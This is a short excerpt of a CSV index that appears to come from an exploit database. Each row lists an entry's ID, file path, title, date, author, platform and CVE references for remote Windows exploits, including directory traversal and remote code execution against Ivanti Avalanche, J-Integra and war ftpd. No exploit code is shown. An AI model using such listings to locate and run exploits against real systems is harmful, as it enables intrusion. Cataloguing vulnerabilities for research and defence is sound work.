20637,exploits/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal",2001-02-16,slipy,remote,windows,,2001-02-16,2012-08-18,1,CVE-2001-0306;OSVDB-7706,,,,,https://www.securityfocus.com/bid/2386/info
51699,exploits/windows/remote/51699.py,"Ivanti Avalanche <v6.4.0.0 - Remote Code Execution",2023-09-04,"Robel Campbell",remote,windows,,2023-09-04,2023-09-04,0,CVE-2023-32560,,,,,
15655,exploits/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow",2010-12-01,Dr_IDE,remote,windows,,2010-12-01,2010-12-01,1,,,,,,
15648,exploits/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,remote,windows,,2010-12-01,2010-12-01,1,,,,,,
20661,exploits/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal",2001-03-06,se00020,remote,windows,,2001-03-06,2012-08-20,1,CVE-2001-0295;OSVDB-874,,,,,https://www.securityfocus.com/bid/2444/info

Can't render this file because it is too large.